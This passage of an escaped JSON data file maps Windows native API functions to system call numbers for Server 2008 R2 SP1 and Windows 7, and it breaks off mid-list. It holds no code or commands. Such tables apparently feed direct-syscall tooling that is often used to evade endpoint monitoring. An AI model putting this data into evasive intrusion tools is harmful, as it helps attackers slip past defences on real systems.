\"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateReserveObject\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtCancelIoFileEx\": 134, \"NtCancelSynchronousIoFile\": 135, \"NtCommitComplete\": 136, \"NtCommitEnlistment\": 137, \"NtCommitTransaction\": 138, \"NtCompactKeys\": 139, \"NtCompareTokens\": 140, \"NtCompleteConnectPort\": 141, \"NtCompressKey\": 142, \"NtConnectPort\": 143, \"NtCreateDebugObject\": 144, \"NtCreateDirectoryObject\": 145, \"NtCreateEnlistment\": 146, \"NtCreateEventPair\": 147, \"NtCreateIoCompletion\": 148, \"NtCreateJobObject\": 149, \"NtCreateJobSet\": 150, \"NtCreateKeyTransacted\": 151, \"NtCreateKeyedEvent\": 152, \"NtCreateMailslotFile\": 153, \"NtCreateMutant\": 154, \"NtCreateNamedPipeFile\": 155, \"NtCreatePagingFile\": 156, \"NtCreatePort\": 157, \"NtCreatePrivateNamespace\": 158, \"NtCreateProcess\": 159, \"NtCreateProfile\": 160, \"NtCreateProfileEx\": 161, \"NtCreateResourceManager\": 162, \"NtCreateSemaphore\": 163, \"NtCreateSymbolicLinkObject\": 164, \"NtCreateThreadEx\": 165, \"NtCreateTimer\": 166, \"NtCreateToken\": 167, \"NtCreateTransaction\": 168, \"NtCreateTransactionManager\": 169, \"NtCreateUserProcess\": 170, \"NtCreateWaitablePort\": 171, \"NtCreateWorkerFactory\": 172, \"NtDebugActiveProcess\": 173, \"NtDebugContinue\": 174, \"NtDeleteAtom\": 175, \"NtDeleteBootEntry\": 176, \"NtDeleteDriverEntry\": 177, \"NtDeleteFile\": 178, \"NtDeleteKey\": 179, \"NtDeleteObjectAuditAlarm\": 180, \"NtDeletePrivateNamespace\": 181, \"NtDeleteValueKey\": 182, \"NtDisableLastKnownGood\": 183, \"NtDisplayString\": 184, \"NtDrawText\": 185, \"NtEnableLastKnownGood\": 186, \"NtEnumerateBootEntries\": 187, \"NtEnumerateDriverEntries\": 188, \"NtEnumerateSystemEnvironmentValuesEx\": 189, \"NtEnumerateTransactionObject\": 190, \"NtExtendSection\": 191, \"NtFilterToken\": 192, \"NtFlushInstallUILanguage\": 193, \"NtFlushInstructionCache\": 194, \"NtFlushKey\": 195, \"NtFlushProcessWriteBuffers\": 196, \"NtFlushVirtualMemory\": 197, \"NtFlushWriteBuffer\": 198, \"NtFreeUserPhysicalPages\": 199, \"NtFreezeRegistry\": 200, \"NtFreezeTransactions\": 201, \"NtGetContextThread\": 202, \"NtGetCurrentProcessorNumber\": 203, \"NtGetDevicePowerState\": 204, \"NtGetMUIRegistryInfo\": 205, \"NtGetNextProcess\": 206, \"NtGetNextThread\": 207, \"NtGetNlsSectionPtr\": 208, \"NtGetNotificationResourceManager\": 209, \"NtGetPlugPlayEvent\": 210, \"NtGetWriteWatch\": 211, \"NtImpersonateAnonymousToken\": 212, \"NtImpersonateThread\": 213, \"NtInitializeNlsFiles\": 214, \"NtInitializeRegistry\": 215, \"NtInitiatePowerAction\": 216, \"NtIsSystemResumeAutomatic\": 217, \"NtIsUILanguageComitted\": 218, \"NtListenPort\": 219, \"NtLoadDriver\": 220, \"NtLoadKey\": 221, \"NtLoadKey2\": 222, \"NtLoadKeyEx\": 223, \"NtLockFile\": 224, \"NtLockProductActivationKeys\": 225, \"NtLockRegistryKey\": 226, \"NtLockVirtualMemory\": 227, \"NtMakePermanentObject\": 228, \"NtMakeTemporaryObject\": 229, \"NtMapCMFModule\": 230, \"NtMapUserPhysicalPages\": 231, \"NtModifyBootEntry\": 232, \"NtModifyDriverEntry\": 233, \"NtNotifyChangeDirectoryFile\": 234, \"NtNotifyChangeKey\": 235, \"NtNotifyChangeMultipleKeys\": 236, \"NtNotifyChangeSession\": 237, \"NtOpenEnlistment\": 238, \"NtOpenEventPair\": 239, \"NtOpenIoCompletion\": 240, \"NtOpenJobObject\": 241, \"NtOpenKeyEx\": 242, \"NtOpenKeyTransacted\": 243, \"NtOpenKeyTransactedEx\": 244, \"NtOpenKeyedEvent\": 245, \"NtOpenMutant\": 246, \"NtOpenObjectAuditAlarm\": 247, \"NtOpenPrivateNamespace\": 248, \"NtOpenProcessToken\": 249, \"NtOpenResourceManager\": 250, \"NtOpenSemaphore\": 251, \"NtOpenSession\": 252, \"NtOpenSymbolicLinkObject\": 253, \"NtOpenThread\": 254, \"NtOpenTimer\": 255, \"NtOpenTransaction\": 256, \"NtOpenTransactionManager\": 257, \"NtPlugPlayControl\": 258, \"NtPrePrepareComplete\": 259, \"NtPrePrepareEnlistment\": 260, \"NtPrepareComplete\": 261, \"NtPrepareEnlistment\": 262, \"NtPrivilegeCheck\": 263, \"NtPrivilegeObjectAuditAlarm\": 264, \"NtPrivilegedServiceAuditAlarm\": 265, \"NtPropagationComplete\": 266, \"NtPropagationFailed\": 267, \"NtPulseEvent\": 268, \"NtQueryBootEntryOrder\": 269, \"NtQueryBootOptions\": 270, \"NtQueryDebugFilterState\": 271, \"NtQueryDirectoryObject\": 272, \"NtQueryDriverEntryOrder\": 273, \"NtQueryEaFile\": 274, \"NtQueryFullAttributesFile\": 275, \"NtQueryInformationAtom\": 276, \"NtQueryInformationEnlistment\": 277, \"NtQueryInformationJobObject\": 278, \"NtQueryInformationPort\": 279, \"NtQueryInformationResourceManager\": 280, \"NtQueryInformationTransaction\": 281, \"NtQueryInformationTransactionManager\": 282, \"NtQueryInformationWorkerFactory\": 283, \"NtQueryInstallUILanguage\": 284, \"NtQueryIntervalProfile\": 285, \"NtQueryIoCompletion\": 286, \"NtQueryLicenseValue\": 287, \"NtQueryMultipleValueKey\": 288, \"NtQueryMutant\": 289, \"NtQueryOpenSubKeys\": 290, \"NtQueryOpenSubKeysEx\": 291, \"NtQueryPortInformationProcess\": 292, \"NtQueryQuotaInformationFile\": 293, \"NtQuerySecurityAttributesToken\": 294, \"NtQuerySecurityObject\": 295, \"NtQuerySemaphore\": 296, \"NtQuerySymbolicLinkObject\": 297, \"NtQuerySystemEnvironmentValue\": 298, \"NtQuerySystemEnvironmentValueEx\": 299, \"NtQuerySystemInformationEx\": 300, \"NtQueryTimerResolution\": 301, \"NtQueueApcThreadEx\": 302, \"NtRaiseException\": 303, \"NtRaiseHardError\": 304, \"NtReadOnlyEnlistment\": 305, \"NtRecoverEnlistment\": 306, \"NtRecoverResourceManager\": 307, \"NtRecoverTransactionManager\": 308, \"NtRegisterProtocolAddressInformation\": 309, \"NtRegisterThreadTerminatePort\": 310, \"NtReleaseKeyedEvent\": 311, \"NtReleaseWorkerFactoryWorker\": 312, \"NtRemoveIoCompletionEx\": 313, \"NtRemoveProcessDebug\": 314, \"NtRenameKey\": 315, \"NtRenameTransactionManager\": 316, \"NtReplaceKey\": 317, \"NtReplacePartitionUnit\": 318, \"NtReplyWaitReplyPort\": 319, \"NtRequestPort\": 320, \"NtResetEvent\": 321, \"NtResetWriteWatch\": 322, \"NtRestoreKey\": 323, \"NtResumeProcess\": 324, \"NtRollbackComplete\": 325, \"NtRollbackEnlistment\": 326, \"NtRollbackTransaction\": 327, \"NtRollforwardTransactionManager\": 328, \"NtSaveKey\": 329, \"NtSaveKeyEx\": 330, \"NtSaveMergedKeys\": 331, \"NtSecureConnectPort\": 332, \"NtSerializeBoot\": 333, \"NtSetBootEntryOrder\": 334, \"NtSetBootOptions\": 335, \"NtSetContextThread\": 336, \"NtSetDebugFilterState\": 337, \"NtSetDefaultHardErrorPort\": 338, \"NtSetDefaultLocale\": 339, \"NtSetDefaultUILanguage\": 340, \"NtSetDriverEntryOrder\": 341, \"NtSetEaFile\": 342, \"NtSetHighEventPair\": 343, \"NtSetHighWaitLowEventPair\": 344, \"NtSetInformationDebugObject\": 345, \"NtSetInformationEnlistment\": 346, \"NtSetInformationJobObject\": 347, \"NtSetInformationKey\": 348, \"NtSetInformationResourceManager\": 349, \"NtSetInformationToken\": 350, \"NtSetInformationTransaction\": 351, \"NtSetInformationTransactionManager\": 352, \"NtSetInformationWorkerFactory\": 353, \"NtSetIntervalProfile\": 354, \"NtSetIoCompletion\": 355, \"NtSetIoCompletionEx\": 356, \"NtSetLdtEntries\": 357, \"NtSetLowEventPair\": 358, \"NtSetLowWaitHighEventPair\": 359, \"NtSetQuotaInformationFile\": 360, \"NtSetSecurityObject\": 361, \"NtSetSystemEnvironmentValue\": 362, \"NtSetSystemEnvironmentValueEx\": 363, \"NtSetSystemInformation\": 364, \"NtSetSystemPowerState\": 365, \"NtSetSystemTime\": 366, \"NtSetThreadExecutionState\": 367, \"NtSetTimerEx\": 368, \"NtSetTimerResolution\": 369, \"NtSetUuidSeed\": 370, \"NtSetVolumeInformationFile\": 371, \"NtShutdownSystem\": 372, \"NtShutdownWorkerFactory\": 373, \"NtSignalAndWaitForSingleObject\": 374, \"NtSinglePhaseReject\": 375, \"NtStartProfile\": 376, \"NtStopProfile\": 377, \"NtSuspendProcess\": 378, \"NtSuspendThread\": 379, \"NtSystemDebugControl\": 380, \"NtTerminateJobObject\": 381, \"NtTestAlert\": 382, \"NtThawRegistry\": 383, \"NtThawTransactions\": 384, \"NtTraceControl\": 385, \"NtTranslateFilePath\": 386, \"NtUmsThreadYield\": 387, \"NtUnloadDriver\": 388, \"NtUnloadKey\": 389, \"NtUnloadKey2\": 390, \"NtUnloadKeyEx\": 391, \"NtUnlockFile\": 392, \"NtUnlockVirtualMemory\": 393, \"NtVdmControl\": 394, \"NtWaitForDebugEvent\": 395, \"NtWaitForKeyedEvent\": 396, \"NtWaitForWorkViaWorkerFactory\": 397, \"NtWaitHighEventPair\": 398, \"NtWaitLowEventPair\": 399, \"NtWorkerFactoryWorkerReady\": 400}, \"R2 SP1\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, \"NtAccessCheck\": 97, \"NtAccessCheckByType\": 98, \"NtAccessCheckByTypeResultList\": 99, \"NtAccessCheckByTypeResultListAndAuditAlarm\": 100, \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\": 101, \"NtAddBootEntry\": 102, \"NtAddDriverEntry\": 103, \"NtAdjustGroupsToken\": 104, \"NtAlertResumeThread\": 105, \"NtAlertThread\": 106, \"NtAllocateLocallyUniqueId\": 107, \"NtAllocateReserveObject\": 108, \"NtAllocateUserPhysicalPages\": 109, \"NtAllocateUuids\": 110, \"NtAlpcAcceptConnectPort\": 111, \"NtAlpcCancelMessage\": 112, \"NtAlpcConnectPort\": 113, \"NtAlpcCreatePort\": 114, \"NtAlpcCreatePortSection\": 115, \"NtAlpcCreateResourceReserve\": 116, \"NtAlpcCreateSectionView\": 117, \"NtAlpcCreateSecurityContext\": 118, \"NtAlpcDeletePortSection\": 119, \"NtAlpcDeleteResourceReserve\": 120, \"NtAlpcDeleteSectionView\": 121, \"NtAlpcDeleteSecurityContext\": 122, \"NtAlpcDisconnectPort\": 123, \"NtAlpcImpersonateClientOfPort\": 124, \"NtAlpcOpenSenderProcess\": 125, \"NtAlpcOpenSenderThread\": 126, \"NtAlpcQueryInformation\": 127, \"NtAlpcQueryInformationMessage\": 128, \"NtAlpcRevokeSecurityContext\": 129, \"NtAlpcSendWaitReceivePort\": 130, \"NtAlpcSetInformation\": 131, \"NtAreMappedFilesTheSame\": 132, \"NtAssignProcessToJobObject\": 133, \"NtCancelIoFileEx\": 134, \"NtCancelSynchronousIoFile\": 135, \"NtCommitComplete\": 136, \"NtCommitEnlistment\": 137, \"NtCommitTransaction\": 138, \"NtCompactKeys\": 139, \"NtCompareTokens\": 140, \"NtCompleteConnectPort\": 141, \"NtCompressKey\": 142, \"NtConnectPort\": 143, \"NtCreateDebugObject\": 144, \"NtCreateDirectoryObject\": 145, \"NtCreateEnlistment\": 146, \"NtCreateEventPair\": 147, \"NtCreateIoCompletion\": 148, \"NtCreateJobObject\": 149, \"NtCreateJobSet\": 150, \"NtCreateKeyTransacted\": 151, \"NtCreateKeyedEvent\": 152, \"NtCreateMailslotFile\": 153, \"NtCreateMutant\": 154, \"NtCreateNamedPipeFile\": 155, \"NtCreatePagingFile\": 156, \"NtCreatePort\": 157, \"NtCreatePrivateNamespace\": 158, \"NtCreateProcess\": 159, \"NtCreateProfile\": 160, \"NtCreateProfileEx\": 161, \"NtCreateResourceManager\": 162, \"NtCreateSemaphore\": 163, \"NtCreateSymbolicLinkObject\": 164, \"NtCreateThreadEx\": 165, \"NtCreateTimer\": 166, \"NtCreateToken\": 167, \"NtCreateTransaction\": 168, \"NtCreateTransactionManager\": 169, \"NtCreateUserProcess\": 170, \"NtCreateWaitablePort\": 171, \"NtCreateWorkerFactory\": 172, \"NtDebugActiveProcess\": 173, \"NtDebugContinue\": 174, \"NtDeleteAtom\": 175, \"NtDeleteBootEntry\": 176, \"NtDeleteDriverEntry\": 177, \"NtDeleteFile\": 178, \"NtDeleteKey\": 179, \"NtDeleteObjectAuditAlarm\": 180, \"NtDeletePrivateNamespace\": 181, \"NtDeleteValueKey\": 182, \"NtDisableLastKnownGood\": 183, \"NtDisplayString\": 184, \"NtDrawText\": 185, \"NtEnableLastKnownGood\": 186, \"NtEnumerateBootEntries\": 187, \"NtEnumerateDriverEntries\": 188, \"NtEnumerateSystemEnvironmentValuesEx\": 189, \"NtEnumerateTransactionObject\": 190, \"NtExtendSection\": 191, \"NtFilterToken\": 192, \"NtFlushInstallUILanguage\": 193, \"NtFlushInstructionCache\": 194, \"NtFlushKey\": 195, \"NtFlushProcessWriteBuffers\": 196, \"NtFlushVirtualMemory\": 197, \"NtFlushWriteBuffer\": 198, \"NtFreeUserPhysicalPages\": 199, \"NtFreezeRegistry\": 200, \"NtFreezeTransactions\": 201, \"NtGetContextThread\": 202, \"NtGetCurrentProcessorNumber\": 203, \"NtGetDevicePowerState\": 204, \"NtGetMUIRegistryInfo\": 205, \"NtGetNextProcess\": 206, \"NtGetNextThread\": 207, \"NtGetNlsSectionPtr\": 208, \"NtGetNotificationResourceManager\": 209, \"NtGetPlugPlayEvent\": 210, \"NtGetWriteWatch\": 211, \"NtImpersonateAnonymousToken\": 212, \"NtImpersonateThread\": 213, \"NtInitializeNlsFiles\": 214, \"NtInitializeRegistry\": 215, \"NtInitiatePowerAction\": 216, \"NtIsSystemResumeAutomatic\": 217, \"NtIsUILanguageComitted\": 218, \"NtListenPort\": 219, \"NtLoadDriver\": 220, \"NtLoadKey\": 221, \"NtLoadKey2\": 222, \"NtLoadKeyEx\": 223, \"NtLockFile\": 224, \"NtLockProductActivationKeys\": 225, \"NtLockRegistryKey\": 226, \"NtLockVirtualMemory\": 227, \"NtMakePermanentObject\": 228, \"NtMakeTemporaryObject\": 229, \"NtMapCMFModule\": 230, \"NtMapUserPhysicalPages\": 231, \"NtModifyBootEntry\": 232, \"NtModifyDriverEntry\": 233, \"NtNotifyChangeDirectoryFile\": 234, \"NtNotifyChangeKey\": 235, \"NtNotifyChangeMultipleKeys\": 236, \"NtNotifyChangeSession\": 237, \"NtOpenEnlistment\": 238, \"NtOpenEventPair\": 239, \"NtOpenIoCompletion\": 240, \"NtOpenJobObject\": 241, \"NtOpenKeyEx\": 242, \"NtOpenKeyTransacted\": 243, \"NtOpenKeyTransactedEx\": 244, \"NtOpenKeyedEvent\": 245, \"NtOpenMutant\": 246, \"NtOpenObjectAuditAlarm\": 247, \"NtOpenPrivateNamespace\": 248, \"NtOpenProcessToken\": 249, \"NtOpenResourceManager\": 250, \"NtOpenSemaphore\": 251, \"NtOpenSession\": 252, \"NtOpenSymbolicLinkObject\": 253, \"NtOpenThread\": 254, \"NtOpenTimer\": 255, \"NtOpenTransaction\": 256, \"NtOpenTransactionManager\": 257, \"NtPlugPlayControl\": 258, \"NtPrePrepareComplete\": 259, \"NtPrePrepareEnlistment\": 260, \"NtPrepareComplete\": 261, \"NtPrepareEnlistment\": 262, \"NtPrivilegeCheck\": 263, \"NtPrivilegeObjectAuditAlarm\": 264, \"NtPrivilegedServiceAuditAlarm\": 265, \"NtPropagationComplete\": 266, \"NtPropagationFailed\": 267, \"NtPulseEvent\": 268, \"NtQueryBootEntryOrder\": 269, \"NtQueryBootOptions\": 270, \"NtQueryDebugFilterState\": 271, \"NtQueryDirectoryObject\": 272, \"NtQueryDriverEntryOrder\": 273, \"NtQueryEaFile\": 274, \"NtQueryFullAttributesFile\": 275, \"NtQueryInformationAtom\": 276, \"NtQueryInformationEnlistment\": 277, \"NtQueryInformationJobObject\": 278, \"NtQueryInformationPort\": 279, \"NtQueryInformationResourceManager\": 280, \"NtQueryInformationTransaction\": 281, \"NtQueryInformationTransactionManager\": 282, \"NtQueryInformationWorkerFactory\": 283, \"NtQueryInstallUILanguage\": 284, \"NtQueryIntervalProfile\": 285, \"NtQueryIoCompletion\": 286, \"NtQueryLicenseValue\": 287, \"NtQueryMultipleValueKey\": 288, \"NtQueryMutant\": 289, \"NtQueryOpenSubKeys\": 290, \"NtQueryOpenSubKeysEx\": 291, \"NtQueryPortInformationProcess\": 292, \"NtQueryQuotaInformationFile\": 293, \"NtQuerySecurityAttributesToken\": 294, \"NtQuerySecurityObject\": 295, \"NtQuerySemaphore\": 296, \"NtQuerySymbolicLinkObject\": 297, \"NtQuerySystemEnvironmentValue\": 298, \"NtQuerySystemEnvironmentValueEx\": 299, \"NtQuerySystemInformationEx\": 300, \"NtQueryTimerResolution\": 301, \"NtQueueApcThreadEx\": 302, \"NtRaiseException\": 303, \"NtRaiseHardError\": 304, \"NtReadOnlyEnlistment\": 305, \"NtRecoverEnlistment\": 306, \"NtRecoverResourceManager\": 307, \"NtRecoverTransactionManager\": 308, \"NtRegisterProtocolAddressInformation\": 309, \"NtRegisterThreadTerminatePort\": 310, \"NtReleaseKeyedEvent\": 311, \"NtReleaseWorkerFactoryWorker\": 312, \"NtRemoveIoCompletionEx\": 313, \"NtRemoveProcessDebug\": 314, \"NtRenameKey\": 315, \"NtRenameTransactionManager\": 316, \"NtReplaceKey\": 317, \"NtReplacePartitionUnit\": 318, \"NtReplyWaitReplyPort\": 319, \"NtRequestPort\": 320, \"NtResetEvent\": 321, \"NtResetWriteWatch\": 322, \"NtRestoreKey\": 323, \"NtResumeProcess\": 324, \"NtRollbackComplete\": 325, \"NtRollbackEnlistment\": 326, \"NtRollbackTransaction\": 327, \"NtRollforwardTransactionManager\": 328, \"NtSaveKey\": 329, \"NtSaveKeyEx\": 330, \"NtSaveMergedKeys\": 331, \"NtSecureConnectPort\": 332, \"NtSerializeBoot\": 333, \"NtSetBootEntryOrder\": 334, \"NtSetBootOptions\": 335, \"NtSetContextThread\": 336, \"NtSetDebugFilterState\": 337, \"NtSetDefaultHardErrorPort\": 338, \"NtSetDefaultLocale\": 339, \"NtSetDefaultUILanguage\": 340, \"NtSetDriverEntryOrder\": 341, \"NtSetEaFile\": 342, \"NtSetHighEventPair\": 343, \"NtSetHighWaitLowEventPair\": 344, \"NtSetInformationDebugObject\": 345, \"NtSetInformationEnlistment\": 346, \"NtSetInformationJobObject\": 347, \"NtSetInformationKey\": 348, \"NtSetInformationResourceManager\": 349, \"NtSetInformationToken\": 350, \"NtSetInformationTransaction\": 351, \"NtSetInformationTransactionManager\": 352, \"NtSetInformationWorkerFactory\": 353, \"NtSetIntervalProfile\": 354, \"NtSetIoCompletion\": 355, \"NtSetIoCompletionEx\": 356, \"NtSetLdtEntries\": 357, \"NtSetLowEventPair\": 358, \"NtSetLowWaitHighEventPair\": 359, \"NtSetQuotaInformationFile\": 360, \"NtSetSecurityObject\": 361, \"NtSetSystemEnvironmentValue\": 362, \"NtSetSystemEnvironmentValueEx\": 363, \"NtSetSystemInformation\": 364, \"NtSetSystemPowerState\": 365, \"NtSetSystemTime\": 366, \"NtSetThreadExecutionState\": 367, \"NtSetTimerEx\": 368, \"NtSetTimerResolution\": 369, \"NtSetUuidSeed\": 370, \"NtSetVolumeInformationFile\": 371, \"NtShutdownSystem\": 372, \"NtShutdownWorkerFactory\": 373, \"NtSignalAndWaitForSingleObject\": 374, \"NtSinglePhaseReject\": 375, \"NtStartProfile\": 376, \"NtStopProfile\": 377, \"NtSuspendProcess\": 378, \"NtSuspendThread\": 379, \"NtSystemDebugControl\": 380, \"NtTerminateJobObject\": 381, \"NtTestAlert\": 382, \"NtThawRegistry\": 383, \"NtThawTransactions\": 384, \"NtTraceControl\": 385, \"NtTranslateFilePath\": 386, \"NtUmsThreadYield\": 387, \"NtUnloadDriver\": 388, \"NtUnloadKey\": 389, \"NtUnloadKey2\": 390, \"NtUnloadKeyEx\": 391, \"NtUnlockFile\": 392, \"NtUnlockVirtualMemory\": 393, \"NtVdmControl\": 394, \"NtWaitForDebugEvent\": 395, \"NtWaitForKeyedEvent\": 396, \"NtWaitForWorkViaWorkerFactory\": 397, \"NtWaitHighEventPair\": 398, \"NtWaitLowEventPair\": 399, \"NtWorkerFactoryWorkerReady\": 400}}, \"Windows 7\": {\"SP0\": {\"NtMapUserPhysicalPagesScatter\": 0, \"NtWaitForSingleObject\": 1, \"NtCallbackReturn\": 2, \"NtReadFile\": 3, \"NtDeviceIoControlFile\": 4, \"NtWriteFile\": 5, \"NtRemoveIoCompletion\": 6, \"NtReleaseSemaphore\": 7, \"NtReplyWaitReceivePort\": 8, \"NtReplyPort\": 9, \"NtSetInformationThread\": 10, \"NtSetEvent\": 11, \"NtClose\": 12, \"NtQueryObject\": 13, \"NtQueryInformationFile\": 14, \"NtOpenKey\": 15, \"NtEnumerateValueKey\": 16, \"NtFindAtom\": 17, \"NtQueryDefaultLocale\": 18, \"NtQueryKey\": 19, \"NtQueryValueKey\": 20, \"NtAllocateVirtualMemory\": 21, \"NtQueryInformationProcess\": 22, \"NtWaitForMultipleObjects32\": 23, \"NtWriteFileGather\": 24, \"NtSetInformationProcess\": 25, \"NtCreateKey\": 26, \"NtFreeVirtualMemory\": 27, \"NtImpersonateClientOfPort\": 28, \"NtReleaseMutant\": 29, \"NtQueryInformationToken\": 30, \"NtRequestWaitReplyPort\": 31, \"NtQueryVirtualMemory\": 32, \"NtOpenThreadToken\": 33, \"NtQueryInformationThread\": 34, \"NtOpenProcess\": 35, \"NtSetInformationFile\": 36, \"NtMapViewOfSection\": 37, \"NtAccessCheckAndAuditAlarm\": 38, \"NtUnmapViewOfSection\": 39, \"NtReplyWaitReceivePortEx\": 40, \"NtTerminateProcess\": 41, \"NtSetEventBoostPriority\": 42, \"NtReadFileScatter\": 43, \"NtOpenThreadTokenEx\": 44, \"NtOpenProcessTokenEx\": 45, \"NtQueryPerformanceCounter\": 46, \"NtEnumerateKey\": 47, \"NtOpenFile\": 48, \"NtDelayExecution\": 49, \"NtQueryDirectoryFile\": 50, \"NtQuerySystemInformation\": 51, \"NtOpenSection\": 52, \"NtQueryTimer\": 53, \"NtFsControlFile\": 54, \"NtWriteVirtualMemory\": 55, \"NtCloseObjectAuditAlarm\": 56, \"NtDuplicateObject\": 57, \"NtQueryAttributesFile\": 58, \"NtClearEvent\": 59, \"NtReadVirtualMemory\": 60, \"NtOpenEvent\": 61, \"NtAdjustPrivilegesToken\": 62, \"NtDuplicateToken\": 63, \"NtContinue\": 64, \"NtQueryDefaultUILanguage\": 65, \"NtQueueApcThread\": 66, \"NtYieldExecution\": 67, \"NtAddAtom\": 68, \"NtCreateEvent\": 69, \"NtQueryVolumeInformationFile\": 70, \"NtCreateSection\": 71, \"NtFlushBuffersFile\": 72, \"NtApphelpCacheControl\": 73, \"NtCreateProcessEx\": 74, \"NtCreateThread\": 75, \"NtIsProcessInJob\": 76, \"NtProtectVirtualMemory\": 77, \"NtQuerySection\": 78, \"NtResumeThread\": 79, \"NtTerminateThread\": 80, \"NtReadRequestData\": 81, \"NtCreateFile\": 82, \"NtQueryEvent\": 83, \"NtWriteRequestData\": 84, \"NtOpenDirectoryObject\": 85, \"NtAccessCheckByTypeAndAuditAlarm\": 86, \"NtQuerySystemTime\": 87, \"NtWaitForMultipleObjects\": 88, \"NtSetInformationObject\": 89, \"NtCancelIoFile\": 90, \"NtTraceEvent\": 91, \"NtPowerInformation\": 92, \"NtSetValueKey\": 93, \"NtCancelTimer\": 94, \"NtSetTimer\": 95, \"NtAcceptConnectPort\": 96, 